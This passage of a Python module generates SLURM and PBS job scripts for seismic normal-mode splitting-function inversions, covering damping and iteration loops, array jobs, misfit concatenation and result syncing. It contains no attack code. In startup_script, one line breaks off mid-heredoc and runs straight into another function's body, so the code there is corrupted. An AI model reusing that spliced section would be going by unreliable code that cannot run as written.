'submission', 'depend'):\n msg += '#SBATCH --exclusive\\n'\n msg += '#SBATCH --mem=200G\\n'\n\n if setup.exclude is not None:\n msg += '#SBATCH --exclude=%s\\n' % setup.exclude\n\n msg += '#SBATCH --partition=%s\\n' % setup.partition\n\n if hasattr(setup, 'pbsmail'):\n msg += '#SBATCH --mail-type=ALL\\n'\n msg += '#SBATCH --mail-user=%s\\n' % setup.pbsmail\n msg += '#SBATCH --nodes=%s\\n' % setup.nodes\n msg += '#SBATCH --cpus-per-task=48\\n'\n msg += '#SBATCH --threads-per-core=2\\n'\n if setup.walltime is not None:\n msg += '#SBATCH --time=%s\\n' % setup.walltime\n else:\n msg += '#SBATCH --time=24:00:00\\n'\n\n if type == 'default':\n if uncertainties is False:\n msg += '#SBATCH --job-name=%s\\n' % setup.pbsjob\n msg += '#SBATCH --error=%s/main.%%A.%%a.err\\n' % (pbsrundir)\n else:\n msg += '#SBATCH --job-name=%s.uncertainties\\n' % setup.pbsjob\n msg += '#SBATCH --error=%s/uncert.%%A.%%a.err\\n' % (pbsrundir)\n msg += '#SBATCH --export=all\\n'\n if setup.rundir.startswith('/quanta'):\n msg += 'MOM=%s\\n' % pbsrundir\n msg += 'RUNDIR=/tmp/$USER\\n'\n msg += 'if [ -e $RUNDIR ]; then rm -rf $RUNDIR; fi\\n'\n msg += 'mkdir -p $RUNDIR\\n'\n msg += 'rsync -r $MOM/* $RUNDIR/.\\n'\n else:\n msg += 'RUNDIR=%s\\n' % pbsrundir\n\n elif type == 'submission':\n msg += '#SBATCH --job-name=%s.job\\n' % setup.pbsjob\n # msg += '#SBATCH --output=%s/log/main.%%A.%%a.out\\n' % (pbsrundir)\n msg += '#SBATCH --error=%s/log/main.%%A.%%a.err\\n' % (pbsrundir)\n msg += '#SBATCH --export=all\\n'\n msg += 'RUNDIR=%s\\n' % pbsrundir\n\n elif type == 'depend':\n # msg += '#SBATCH --output=%s/log/array.%%A.%%a.out\\n' % pbsrundir\n msg += '#SBATCH --error=%s/log/array.%%A.%%a.err\\n' % pbsrundir\n msg += 'RUNDIR=%s\\n' % pbsrundir\n\n elif type == 'array':\n if not setup.rundir.startswith('/quanta'):\n msg += 'MAINDIR=%s\\n' % pbsrundir\n if len(setup.events) > 1:\n msg += 'EVENT=$1\\n'\n msg += 'iterno=$2\\n'\n msg += 'ed_it=$3\\n'\n msg += 'SEGDIR=$4\\n'\n msg += 'damp=$5\\n'\n msg += 'MAINDIR=$6\\n\\n'\n if setup.intype == 'CST':\n msg += 'RUNDIR=$MAINDIR/$SEGDIR/$EVENT\\n'\n else:\n msg += 'EVENT=$1\\n'\n msg += 'iterno=$2\\n'\n msg += 'ed_it=$3\\n'\n msg += 'damp=$4\\n'\n msg += 'MAINDIR=$5\\n\\n'\n if setup.intype == 'CST':\n msg += 'RUNDIR=$MAINDIR/$EVENT\\n'\n\n if setup.intype == 'FSI':\n splittingdir = setup.splittingdir\n if splittingdir.startswith('//nfs'):\n splittingdir = splittingdir.replace('//nfs/stig/',\n '/home/')\n msg += 'SPLITDIR=%s\\n' % (splittingdir)\n\n if len(setup.events) > 1:\n msg += 'RUNDIR=$SPLITDIR/$SEGDIR/$EVENT\\n'\n\n else:\n msg += 'RUNDIR=$SPLITDIR/$EVENT\\n'\n\n else:\n msg = ''\n if hasattr(setup, 'pbsmail'):\n msg += '#PBS -m abe -M %s\\n' % setup.pbsmail\n if type == 'default':\n msg += '#PBS -N %s\\n' % setup.pbsjob\n msg += '#PBS -l nodes=1:ppn=1\\n'\n msg += '#PBS -e log.$PBS_JOBNAME.$PBS_JOBID.err\\n'\n msg += '#PBS -o log.$PBS_JOBNAME.$PBS_JOBID.out\\n'\n msg += 'RUNDIR=%s\\n' % pbsrundir\n\n elif type == 'depend':\n msg += '#PBS -l nodes=1:ppn=1\\n'\n msg += '#PBS -e log/log.$PBS_JOBNAME.$PBS_JOBID.err\\n'\n msg += '#PBS -o log/log.$PBS_JOBNAME.$PBS_JOBID.out\\n'\n msg += 'RUNDIR=%s\\n' % pbsrundir\n\n elif type == 'array':\n if (\n isinstance(setup.segmentsdir, AttribDict) or\n isinstance(setup.segmentsdir, dict)\n ):\n tot_ev = 0\n for segdir, allevents in setup.events.items():\n tot_ev += len(allevents)\n n = tot_ev\n\n if n > 96:\n t = 96\n else:\n t = n\n else:\n n = len(setup.events)\n t = n\n msg += '#PBS -l walltime=1:00:00,nodes=1:ppn=1\\n'\n msg += '#PBS -t 1-%s%%%s\\n' % (n, t)\n msg += '#PBS -e log/log.$PBS_JOBNAME.$PBS_JOBID.err\\n'\n msg += '#PBS -o log/log.$PBS_JOBNAME.$PBS_JOBID.out\\n\\n'\n msg += 'MAINDIR=%s\\n' % pbsrundir\n\n return msg\n\n\ndef script(setup, output='pbs'):\n \"\"\"\n Creates a pbs or bash script to submit an inversion, using the information\n given in the setup object.\n \"\"\"\n\n if setup.intype == 'CST':\n if output in [None, 'pbs', 'SLURM', 'slurm']:\n msg = dorun_submission_header(setup)\n elif output == 'bash':\n msg = 'RUNDIR=%s\\n' % setup.rundir\n\n msg += 'cd $RUNDIR\\n'\n\n msg += '\\n'\n msg += '#----------------#\\n'\n msg += '# DAMPING LOOP #\\n'\n msg += '#----------------#\\n'\n msg += 'for damp in %s\\n' % get_damping_string(setup)\n msg += 'do\\n'\n msg += 'echo \"Starting run for damping: $damp\" >> progress.out\\n'\n # /home/deuss/modes/allsplitting/dorun-itmC3.sh ${lmax} 4 0 ${damp}\n\n msg += dorun_startup(setup)\n\n msg += '\\n'\n msg += '#------------------------#\\n'\n msg += '# ITERATION LOOP START #\\n'\n msg += '#------------------------#\\n'\n # ##/home/deuss/modes/allsplitting/dorun-derivC3.sh $1 $2 $3\\n'\n m = 'for (( iterno=%s; iterno<=%s; iterno++ ))\\n'\n msg += m % (setup.iterations[0], setup.iterations[1])\n msg += 'do\\n'\n msg += 'echo \" Iteration: $iterno\" >> progress.out\\n'\n\n msg += dorun_cst_partials(setup)\n\n if len(setup.modes_sc_dst) > 0:\n msg += dorun_dst_partials(setup)\n\n msg += dorun_buildATA(setup)\n\n msg += dorun_invATA(setup)\n\n # '/home/deuss/modes/allsplitting/dorun-newC3.sh $1 $2 $3\\n'\n msg += dorun_mdcpl(setup)\n\n msg += dorun_synseis_inv(setup)\n\n msg += dorun_misfits(setup)\n\n msg += 'done\\n'\n msg += '\\n'\n msg += '#----------------------#\\n'\n msg += '# ITERATION LOOP END #\\n'\n msg += '#----------------------#\\n'\n\n msg += dorun_summary(setup)\n\n msg += 'done\\n'\n msg += '#--------------------#\\n'\n msg += '# DAMPING LOOP END #\\n'\n msg += '#--------------------#\\n'\n msg += dorun_cleanup(setup)\n msg += 'echo \"Finished Run\" >> progress.out\\n'\n\n elif setup.intype == 'FSI':\n msg = dorun_submission_header(setup)\n msg += 'cd $RUNDIR\\n'\n\n modes = ''\n for mode in setup.modedirs:\n mdir = join(setup.splittingdir, mode)\n modes = modes + \"%s \" % (mdir)\n\n msg += dorun_preprundir(setup)\n\n msg += '\\n'\n msg += '#----------------#\\n'\n msg += '# DAMPING LOOP #\\n'\n msg += '#----------------#\\n'\n msg += 'for damp in %s\\n' % get_damping_string(setup)\n msg += 'do\\n'\n msg += 'echo \"Starting run for damping: $damp\" >> progress.out\\n'\n\n msg += 'echo \"Starting up\" >> progress.out\\n'\n msg += 'for mdir in %s\\n' % (modes)\n msg += 'do\\n'\n msg += 'cd $mdir\\n'\n msg += dorun_startup(setup)\n msg += 'done\\n'\n\n msg += '\\n'\n msg += '#------------------------#\\n'\n msg += '# ITERATION LOOP START #\\n'\n msg += '#------------------------#\\n'\n msg += 'for (( iterno=%s; iterno<=%s; iterno++ ))\\n'\n msg = msg % (setup.iterations[0], setup.iterations[1])\n msg += 'do\\n'\n msg += 'echo \" Iteration: $iterno\" >> progress.out\\n'\n\n msg += 'echo \" -fsi partials\" >> progress.out\\n'\n msg += 'echo \" -buildATA\" >> progress.out\\n'\n msg += '# BEGIN LOOP THROUGH MODE FOLDERS\\n'\n msg += 'for mdir in %s\\n' % (modes)\n msg += 'do\\n'\n msg += 'cd $mdir\\n'\n msg += dorun_fsi_partials(setup)\n\n msg += dorun_buildATA(setup)\n\n msg += 'done\\n' # end loop over mode folders\n msg += '# END LOOP THROUGH MODE FOLDERS\\n'\n\n # GO BACK TO INVERSION FOLDER\n msg += '#\\n'\n msg += 'cd $RUNDIR\\n'\n\n msg += dorun_addATA(setup)\n\n msg += dorun_invATA(setup)\n\n # GO TO EACH MODES-FOLDER TO CALCULATE MDCPL, MATDIAG, SYNSEIS, MISFIT\n msg += '#\\n'\n msg += '# BEGIN LOOP THROUGH MODE FOLDERS\\n'\n msg += 'for mdir in %s\\n' % (modes)\n msg += 'do\\n'\n msg += 'cd $mdir\\n'\n\n msg += dorun_mdcpl(setup)\n\n msg += dorun_synseis_inv(setup)\n\n msg += 'done\\n' # end loop over mode folders\n msg += '# END LOOP THROUGH MODE FOLDERS\\n'\n msg += '#\\n'\n\n # AND BACK TO INVERSION FOLDER\n msg += 'cd $RUNDIR\\n'\n\n msg += dorun_misfits(setup)\n\n msg += 'done\\n'\n msg += '\\n'\n msg += '#----------------------#\\n'\n msg += '# ITERATION LOOP END #\\n'\n msg += '#----------------------#\\n'\n\n msg += dorun_summary(setup)\n\n msg += 'done\\n'\n msg += '#--------------------#\\n'\n msg += '# DAMPING LOOP END #\\n'\n msg += '#--------------------#\\n'\n msg += dorun_cleanup(setup)\n msg += 'echo \"Finished Run\" >> progress.out\\n'\n\n if output == 'bash':\n pbs_file = 'run_me.sh'\n elif output == 'slurm':\n pbs_file = 'sbatch_me.sh'\n else:\n pbs_file = 'qsub_me.pbs'\n\n if setup.rundir.startswith('/scratch'):\n src = setup.rundir\n dst = setup.rundir.replace('/scratch', '/quanta1/home')\n dst = '/'.join(dst.split('/')[:-1])\n msg += 'SRC=%s\\n' % (src)\n msg += 'DST=%s\\n' % (dst)\n msg += 'mkdir -p %s \\n' % dst\n msg += 'rsync -r --delete $SRC $DST'\n\n pbs_path = join(setup.rundir, pbs_file)\n with open(pbs_path, 'w+') as fh:\n fh.write(msg)\n return\n\n\ndef startup_script(setup):\n # for array pbs dependencies\n \"\"\"\n Creates a pbs script to submit an inversion, using the information\n given in the setup object.\n \"\"\"\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch') or\n setup.scripttype == 'slurm'\n ):\n if setup.intype == 'CST':\n msg = '#!/bin/bash\\n'\n msg += 'damp=${{1}}\\n'\n msg += 'RUNDIR=${{2}}\\n\\n'\n elif setup.intype == 'FSI':\n msg = '#!/bin/bash\\nsdir=${{1}}\\n'\n msg += 'RUNDIR=%s\\n' % setup.rundir\n else:\n msg = dorun_submission_header(setup, type='depend')\n\n if setup.intype == 'CST':\n m = 'cd $RUNDIR\\n'\n m += '\\n'\n\n # Startmodel mzero.dat and mcst.dat are generated by create.startmodel\n m += '#---------------------------#\\n'\n m += '# STARTUP WITH ZERO MODEL #\\n'\n m += '#---------------------------#\\n'\n\n m += 'echo \"Starting run for damping: $damp\" >> progress.out\\n'\n m += 'echo \"Starting up\" >> progress.out\\n'\n m += 'rm inversion.dat inversion.out att.dat 2> /dev/null\\n'\n m += '\\n'\n m += 'cp mzero.dat mcst.dat\\n'\n m += 'cp mzero.dat inversion_out/.\\n\\n'\n m += 'echo \" -rot+ellip\" >> progress.out\\n'\n m += '{rot_ellip}\\n\\n'\n m = m.format(rot_ellip=join(setup.bindir, setup.bins.rot_ellip))\n\n if len(setup.modes_sc_dst) > 0:\n m += 'echo \" -write_dst\" >> progress.out\\n'\n m += '{write_dst} << EOF\\n'\n for mode, smax in setup.modes_sc.items():\n m += '%s\\n' % smax\n for mode, smax in setup.modes_sc_dst.items():\n m += '%s\\n' % smax\n m += 'EOF\\n\\n'\n m = m.format(write_dst=join(setup.bindir, setup.bins.write_dst))\n\n m += 'echo \" -matrixcst\" >> progress.out\\n'\n m += '{mdcpl} << EOF\\n'\n for mode, smax in setup.modes_sc.items():\n # /home/deuss/bin/matrixcst\n # maximum structural deg for every mode\n m += '0 %s\\n' % smax\n if hasattr(setup, 'modes_cc'):\n # /home/deuss/bin/matrixcstC\n for mode, s in setup.modes_cc.items():\n m += '%s %s\\n' % (s[0], s[1])\n m += 'EOF\\n'\n m = m.format(mdcpl=join(setup.bindir, setup.bins.mdcpl))\n\n if len(setup.modes_sc_dst) > 0:\n m += 'mv matrix.dat matrix-cst.dat\\n\\n'\n # /home/deuss/bin/matrixdst\n m += 'echo \" -matrixdst\" >> progress.out\\n'\n m += '{mdcplmq} << EOF\\n'\n for mode, smax in setup.modes_sc_dst.items():\n # /home/deuss/bin/matrixcst\n # maximum structural deg for every mode\n m += '2 %s\\n' % smax\n m += 'EOF\\n'\n m += 'mv matrix.dat matrix-dst.dat\\n\\n'\n m += 'echo \" -addmdcplmq\" >> progress.out\\n'\n m += '{addmdcplmq} << EOF\\n'\n m += 'matrix-cst.dat\\n'\n m += 'matrix-dst.dat\\n'\n m += 'EOF\\n\\n'\n m = m.format(mdcplmq=join(setup.bindir, setup.bins.mdcplmq),\n addmdcplmq=join(setup.bindir, setup.bins.addmdcplmq))\n\n elif setup.intype == 'FSI':\n m = 'cd $sdir\\n'\n m += 'echo \" -mdcpl\" >> $RUNDIR/progress.out\\n'\n m += '{mdcpl} -model {zeromodel} < 0:\n msg += dorun_dst_partials_array(setup)\n msg += dorun_buildATA_array(setup)\n elif setup.intype == 'FSI':\n msg += dorun_fsi_partials_array(setup)\n msg += '\\n'\n msg += 'fi\\n\\n'\n\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch') or\n setup.scripttype == 'slurm'\n ):\n\n if uncertainties is False:\n pbs_file = 'sbatch_array.sh'\n else:\n pbs_file = 'uncertainties/sbatch_array.sh'\n else:\n pbs_file = 'qsub_array.pbs'\n\n pbs_path = join(setup.rundir, pbs_file)\n with open(pbs_path, 'w+') as fh:\n fh.write(msg)\n os.chmod(pbs_path, 0o777)\n return\n\n\ndef new_script(setup, uncertainties=False):\n \"\"\"\n Creates a pbs script to submit an inversion, using the information\n given in the setup object.\n \"\"\"\n def cat_misfits(setup, uncertainties):\n msg = \"while read event; do\\n\"\n msg += \" weight=`echo $event | awk '{print $NF}'`\\n\"\n msg += \" if [[ $weight =~ ^[+-]?[0-9]+\\.?[0-9]*$ ]]; then\\n\"\n msg += \" EVENT=`echo $event | awk '{print $2}'`\\n\"\n msg += \" else\\n\"\n msg += \" EVENT=`echo $event | awk '{print $NF}'`\\n\"\n msg += \" fi\\n\"\n msg += \" SEGDIR=`echo $event | awk '{print $1}'`\\n\"\n if len(setup.events) > 1:\n msg += '\\tif [ -e $SEGDIR/$EVENT/$EVENT.misfit ]; then\\n'\n msg += '\\t\\tcat $SEGDIR/$EVENT/dobsr.dat >> dobsr.dat\\n'\n msg += '\\t\\tcat $SEGDIR/$EVENT/dobsi.dat >> dobsi.dat\\n'\n msg += '\\t\\tcat $SEGDIR/$EVENT/dsynr.dat >> dsynr.dat\\n'\n msg += '\\t\\tcat $SEGDIR/$EVENT/dsyni.dat >> dsyni.dat\\n'\n msg += '\\t\\tcat $SEGDIR/$EVENT/misfit.dat >> misfit-$SEGDIR.dat\\n'\n msg += '\\t\\tcat $SEGDIR/$EVENT/$EVENT.misfit >> $EVENT.misfit\\n'\n msg += '\\telse\\n'\n msg += '\\t\\techo \"No file: $damp, $iterno, $SEGDIR/$EVENT\" '\n msg += '>> $RUNDIR/progress.err\\n'\n msg += '\\tfi\\n'\n else:\n msg += '\\tif [ -e $RUNDIR/$EVENT/$EVENT.misfit ]; then\\n'\n msg += '\\t\\tcat $RUNDIR/$EVENT/dobsr.dat >> dobsr.dat\\n'\n msg += '\\t\\tcat $RUNDIR/$EVENT/dobsi.dat >> dobsi.dat\\n'\n msg += '\\t\\tcat $RUNDIR/$EVENT/dsynr.dat >> dsynr.dat\\n'\n msg += '\\t\\tcat $RUNDIR/$EVENT/dsyni.dat >> dsyni.dat\\n'\n msg += '\\t\\tcat $RUNDIR/$EVENT/misfit.dat >> misfit.dat\\n'\n msg += '\\telse\\n'\n msg += '\\t\\techo \"No file: $damp, $iterno, $EVENT\" '\n msg += '>> $RUNDIR/progress.err\\n'\n msg += '\\tfi\\n'\n if uncertainties is True:\n msg += 'done < $set_name\\n\\n'\n else:\n msg += 'done < allevents\\n\\n'\n return msg\n\n if setup.intype == 'FSI':\n splittingdir = setup.splittingdir\n if splittingdir.startswith('//nfs'):\n splittingdir = splittingdir.replace('//nfs/stig/', '/home/')\n\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch') or\n setup.scripttype == 'slurm'\n ):\n msg = '#!/bin/bash\\n'\n msg += 'damp=${1}\\n'\n msg += 'iterno=${2}\\n'\n msg += 'ed_it=${3}\\n'\n\n if uncertainties is True:\n msg += 'set_name=${4}\\n'\n msg += 'RUNDIR=${5}\\n'\n msg += 'set_filename=`echo $set_name | '\n msg += \"rev | cut -d'/' -f1 | rev`\\n\"\n else:\n msg += 'RUNDIR=${4}\\n'\n\n else:\n msg = dorun_submission_header(setup, type='depend')\n\n msg += 'cd $RUNDIR\\n'\n msg += 'rm dsyni.dat dsynr.dat dobsi.dat dobsr.dat 2> /dev/null\\n'\n msg += 'rm misfitfiles.in misfit*dat *.misfit 2> /dev/null\\n'\n msg += '\\n'\n if setup.intype == 'FSI':\n msg += 'SPLITDIR=%s\\n' % (splittingdir)\n msg += 'cd $SPLITDIR\\n'\n msg += '#----------------------#\\n'\n msg += '# Concatenate events #\\n'\n msg += '#----------------------#\\n'\n msg += 'echo \" -Concatenate events\" >> $RUNDIR/progress.out\\n'\n\n if setup.intype == 'CST':\n msg += cat_misfits(setup, uncertainties)\n msg += nan_check_misfits()\n if len(setup.events) > 1:\n for segname, sdir in setup.segmentsdir.items():\n msg += 'N=`cat misfit-%s.dat | wc -l`\\n' % segname\n msg += 'if [ $N -gt 0 ]; then\\n'\n msg += '\\techo misfit-%s.dat >> misfitfiles.in \\n' % segname\n msg += 'fi\\n'\n\n elif setup.intype == 'FSI':\n # maybe also cat_misfits here?\n msg += 'while IFS=\" \" read -r SEGDIR EVENT; do\\n'\n msg += 'cat $SEGDIR/$EVENT/dobsr.dat >> $RUNDIR/dobsr.dat\\n'\n msg += 'cat $SEGDIR/$EVENT/dobsi.dat >> $RUNDIR/dobsi.dat\\n'\n msg += 'cat $SEGDIR/$EVENT/dsynr.dat >> $RUNDIR/dsynr.dat\\n'\n msg += 'cat $SEGDIR/$EVENT/dsyni.dat >> $RUNDIR/dsyni.dat\\n'\n msg += 'cat $SEGDIR/$EVENT/misfit.dat >> '\n msg += '$RUNDIR/misfit-$SEGDIR.dat\\n'\n msg += 'cat $SEGDIR/$EVENT/$EVENT.misfit >> '\n msg += '$RUNDIR/$EVENT.misfit\\n'\n msg += 'done < $RUNDIR/allevents\\n\\n'\n for segname, sdir in setup.segmentsdir.items():\n msg += 'echo misfit-%s.dat >> ' % segname\n msg += '$RUNDIR/misfitfiles.in \\n'\n msg += 'cd $RUNDIR\\n'\n\n msg += dorun_misfits_array(setup, uncertainties)\n msg += 'fi\\n'\n msg += '\\n'\n msg += 'if [[ $iterno -ne $ed_it ]]; then\\n'\n msg += 'echo \" End of iteration\" $(($iterno-1)) >> progress.out\\n\\n'\n msg += dorun_addATA(setup, uncertainties)\n msg += dorun_invATA(setup)\n\n if setup.intype == 'CST':\n msg += dorun_mdcpl(setup)\n elif setup.intype == 'FSI':\n segdirs = ''\n for segname, sdir in setup.segmentsdir.items():\n if sdir.startswith('//nfs'):\n sdir = sdir.replace('//nfs/stig/', '/home/')\n segdirs = segdirs + \"%s \" % sdir\n msg += 'for sdir in %s\\n' % segdirs\n msg += 'do\\n'\n msg += 'cd $sdir\\n'\n msg += dorun_mdcpl(setup)\n msg += 'done\\n'\n\n msg += 'else\\n'\n msg += dorun_summary(setup, uncertainties)\n\n if setup.intype == 'CST' and len(setup.segmentsdir) > 1:\n # if uncertainties is True:\n # msg += 'while IFS=\" \" read -r SEGDIR EVENT WEIGHT; do\\n'\n # else:\n # msg += 'while IFS=\" \" read -r SEGDIR EVENT; do\\n'\n msg += \"while read event; do\\n\"\n msg += \" weight=`echo $event | awk '{print $NF}'`\\n\"\n msg += \" if [[ $weight =~ ^[+-]?[0-9]+\\.?[0-9]*$ ]]; then\\n\"\n msg += \" EVENT=`echo $event | awk '{print $2}'`\\n\"\n msg += \" else\\n\"\n msg += \" EVENT=`echo $event | awk '{print $NF}'`\\n\"\n msg += \" fi\\n\"\n msg += \" SEGDIR=`echo $event | awk '{print $1}'`\\n\"\n msg += ' cat $SEGDIR/$EVENT/$EVENT.misfit >> '\n msg += '$SEGDIR/$EVENT-d$damp.misfit\\n'\n\n if uncertainties is True:\n msg += 'done < $set_name\\n\\n'\n else:\n msg += 'done < allevents\\n\\n'\n elif setup.intype == 'FSI' and len(setup.segmentsdir) > 1:\n msg += 'while IFS=\" \" read -r SEGDIR EVENT; do\\n'\n msg += 'cat $SEGDIR/$EVENT/$EVENT.misfit >> '\n msg += '$SEGDIR/$EVENT-d$damp.misfit\\n'\n msg += 'done < $RUNDIR/allevents\\n\\n'\n msg += 'echo \" End of inversion\" >> progress.out\\n\\n'\n msg += 'fi\\n\\n'\n\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch') or\n setup.scripttype == 'slurm'\n ):\n if uncertainties is True:\n pbs_file = 'uncertainties/sbatch_new.sh'\n else:\n pbs_file = 'sbatch_new.sh'\n else:\n pbs_file = 'qsub_new.pbs'\n\n pbs_path = join(setup.rundir, pbs_file)\n with open(pbs_path, 'w+') as fh:\n fh.write(msg)\n return\n\n\ndef nan_check_misfits():\n msg = 'count=`grep \"NaN\" $RUNDIR/misfit*.dat | wc -l`\\n'\n msg += 'if [ $count != 0 ]; then\\n'\n msg += ' #stat=`grep -B 3 \"NaN\" $RUNDIR/misfit*.dat | '\n msg += \"cut -d'-' -f1 | cut -d' ' -f1`\\n\"\n msg += ' comp=`grep -B1 \"NaN\" misfit*.dat '\n msg += \"| cut -d'-' -f2 | \"\n msg += 'awk \"NR==1{print $1}\"'\n msg += \" | cut -d'.' -f1`\\n\"\n msg += ' eventid=`grep -B1 \"NaN\" misfit*.dat | '\n msg += \"cut -d'-' -f3 | xargs`\\n\"\n msg += ' echo \"misfit*.dat: NaN found in '\n msg += '$damp $iterno $comp $eventid\" '\n msg += '>> $RUNDIR/progress.err\\n'\n msg += ' echo \" NaN found, next damping\" '\n msg += '>> $RUNDIR/progress.out\\n'\n msg += ' exit 404\\n'\n msg += 'fi\\n\\n'\n return msg\n\n\ndef dependencies_script(setup, uncertainties=False, iter_damp_test=False):\n \"\"\"\n Creates a dependencies script to submit an inversion, using PBS arrays and\n the information given in the setup object.\n \"\"\"\n\n if (\n setup.rundir.startswith('/quanta') or\n setup.rundir.startswith('/scratch') or\n setup.scripttype == 'slurm'\n ):\n msg = dorun_submission_header(setup, uncertainties=uncertainties)\n msg += 'cd $RUNDIR\\n'\n if uncertainties is False:\n msg += 'rm inversion_out/inversion.db 2> /dev/null\\n\\n'\n\n msg += '#----------------#\\n'\n msg += '# DAMPING LOOP #\\n'\n msg += '#----------------#\\n'\n if uncertainties is True:\n msg += 'damp=%s\\n' % setup.damping\n msg += 'while read subset;\\ndo\\n'\n else:\n if iter_damp_test is False:\n msg += 'for damp in %s\\n' % get_damping_string(setup)\n else:\n ds = get_damping_string(setup)\n ds = ds.split()[0] + ' #' + ' '.join(ds.split()[1:])\n msg += 'for damp in %s\\n' % ds\n msg += 'do\\n'\n if setup.intype == 'CST':\n msg += 'bash sbatch_startup.sh ${damp} $RUNDIR\\n\\n'\n elif setup.intype == 'FSI':\n msg += 'cd $RUNDIR\\n'\n msg += dorun_preprundir(setup)\n msg += '\\nN=0\\n'\n sdirs = ''\n for segname, sdir in setup.segmentsdir.items():\n sdirs += \"%s \" % sdir\n\n msg += 'for sdir in %s; do\\n' % sdirs\n\n msg += ' if (( $N >= 48 )); then\\n'\n msg += ' for pid in ${pids[*]}; do\\n'\n msg += ' wait $pid\\n'\n msg += ' pids=${pids[@]/$pid}\\n'\n msg += ' N=$(( N-1 ))\\n'\n msg += ' break\\n'\n msg += ' done\\n'\n msg += ' fi\\n'\n\n msg += ' bash sbatch_startup.sh $sdir &\\n'\n\n msg += ' pids[${N}]=$!\\n'\n msg += ' N=$(( N+1 ))\\n'\n msg += 'done\\n'\n msg += 'wait\\n'\n\n msg += '#------------------------#\\n'\n msg += '# ITERATION LOOP START #\\n'\n msg += '#------------------------#\\n'\n if iter_damp_test is False:\n msg += 'ed_it=%s\\n' % (setup.iterations[1]+1)\n else:\n msg += 'ed_it=2 #%s\\n' % (setup.iterations[1]+1)\n it = 'for (( iterno=%s; iterno<=${ed_it}; iterno++ ))\\n'\n msg += it % (setup.iterations[0])\n msg += 'do\\n\\n'\n\n if len(setup.events) == 1:\n print('read_event_loop.pl will NOT fork correct!')\n print('read_event_loop.pl will mix up Set and cmt')\n msg += '#This part must be parallel\\n'\n msg += 'echo \" -run events iteration $(( iterno-1 )) / '\n msg += '$(( ed_it-1 ))\" >> $RUNDIR/progress.out\\n'\n msg += 'perl read_event_loop.pl '\n msg += '$RUNDIR allevents 40 $iterno $ed_it $damp\\n'\n msg += 'wait\\n'\n # msg += 'if [ $? != 0 ]; then break; fi\\n\\n'\n\n msg += '\\n# Wait until array finished, then do\\n'\n if uncertainties is True:\n msg += 'bash uncertainties/sbatch_new.sh ${damp} ${iterno} '\n msg += '${ed_it} $subset $RUNDIR\\n\\n'\n else:\n msg += 'bash sbatch_new.sh ${damp} ${iterno} ${ed_it} $RUNDIR\\n\\n'\n\n if setup.rundir.startswith('/quanta'):\n msg += '\\n# Sync after each iteration\\n'\n if uncertainties is True:\n msg += 'cp -r $RUNDIR/uncertainties $MOM/.\\n'\n else:\n msg += 'cp -r $RUNDIR/inversion_out $MOM/.\\n'\n msg += 'cp $RUNDIR/*out $MOM/.\\n'\n msg += 'cp $RUNDIR/*err $MOM/.\\n'\n\n # msg += 'if [ $? != 0 ]; then break; fi\\n\\n'\n msg += '\\n# Check here for NFS errors\\n'\n msg += \"err_no=`grep 'sqlite3.OperationalError'\"\n if setup.rundir.startswith('/quanta'):\n msg += \" $MOM/main*.err | wc -l`\\n\"\n else:\n msg += \" $RUNDIR/main*.err | wc -l`\\n\"\n msg += \"if [[ ! $err_no == 0 ]]; then\\n\"\n msg += \" echo 'NFS error, sqlite3 cannot write on disk' >> \"\n msg += \"$RUNDIR/progress.out\\n\"\n msg += \" exit 1\\n\"\n msg += \"fi\\n\"\n msg += 'done\\n'\n\n if uncertainties is True:\n msg += 'done < $RUNDIR/uncertainties/subsets\\n'\n else:\n msg += 'done\\n\\n'\n msg += 'mv [0-9]*[A-Z].misfit inversion_out/.\\n'\n msg += 'rm inversion.dat *misfit* mdcpl.out *.bin '\n msg += 'mnew* Cmat* Rmat* 2> /dev/null\\n'\n if setup.keep_all_output is not True:\n msg += 'ls *dat | xargs -I {{}} find {{}} -type f -not -name '\n msg += \"'???????.dat' -delete \\n\"\n if setup.rundir.startswith('/scratch'):\n src = setup.rundir\n dst = setup.rundir.replace('/scratch', '/quanta1/home')\n dst = '/'.join(dst.split('/')[:-1])\n msg += 'SRC=%s\\n' % (src)\n msg += 'DST=%s\\n' % (dst)\n msg += 'mkdir -p %s\\n' % dst\n msg += 'rsync -r --delete $SRC $DST'\n if setup.rundir.startswith('/quanta'):\n if uncertainties is True:\n msg += 'rsync -r --delete $RUNDIR/uncertainties $MOM/.\\n'\n else:\n msg += 'rsync -r --delete $RUNDIR/inversion_out $MOM/.\\n'\n msg += 'cp $RUNDIR/*out $MOM/.\\n'\n msg += 'cp $RUNDIR/*err $MOM/.\\n'\n msg += 'cd ~\\n'\n msg += 'rm -rf /tmp/$USER\\n'\n\n elif setup.intype == 'CST' and setup.rundir.startswith('/home'):\n start1 = \"$(qsub -N %s -v damp=${damp} qsub_startup.pbs)\\n\"\n\n start2 = \"$(qsub -N %s -v damp=${damp} -W depend=afterok:$OLD \"\n start2 += \"qsub_startup.pbs)\\n\"\n\n array = \"$(qsub -N %s -v %s -W depend=afterok:$OLD \"\n array += \"qsub_array.pbs)\\n\"\n\n new = \"$(qsub -N %s -v %s -W depend=afterokarray:$ARRAY \"\n new += \"qsub_new.pbs)\\n\"\n\n msg = '#!/bin/bash\\n'\n msg += 'mkdir log\\n'\n msg += 'st_it=%s\\n' % setup.iterations[0]\n msg += 'ed_it=%s\\n' % setup.iterations[1]\n msg += 'ed_it=$(($ed_it+1))\\n'\n msg += 'count=1\\n'\n\n var = 'damp=${damp},iterno=${iterno},ed_it=${ed_it}'\n\n msg += '\\n'\n msg += '#----------------#\\n'\n msg += '# DAMPING LOOP #\\n'\n msg += '#----------------#\\n'\n msg += 'for damp in %s\\n' % get_damping_string(setup)\n msg += 'do\\n'\n name = '%s_startup_d${damp}' % setup.pbsjob\n msg += 'if [[ count -eq 1 ]]; then\\n'\n msg += 'START=' + start1 % name\n msg += 'else\\n'\n msg += 'START=' + start2 % name\n\n msg += 'fi\\n\\n'\n msg += \"STARTID=`echo $START | cut -d' ' -f4`\\n\"\n msg += 'OLD=$STARTID\\n'\n msg += '((count++))\\n'\n msg += '\\n'\n msg += '#------------------------#\\n'\n msg += '# ITERATION LOOP START #\\n'\n msg += '#------------------------#\\n'\n msg += 'for (( iterno=$st_it; iterno<=$ed_it; iterno++ ))\\n'\n msg += 'do\\n'\n\n name = '%s_array_d${damp}_it${iterno}' % setup.pbsjob\n msg += 'ARRAY=' + array % (name, var)\n msg += 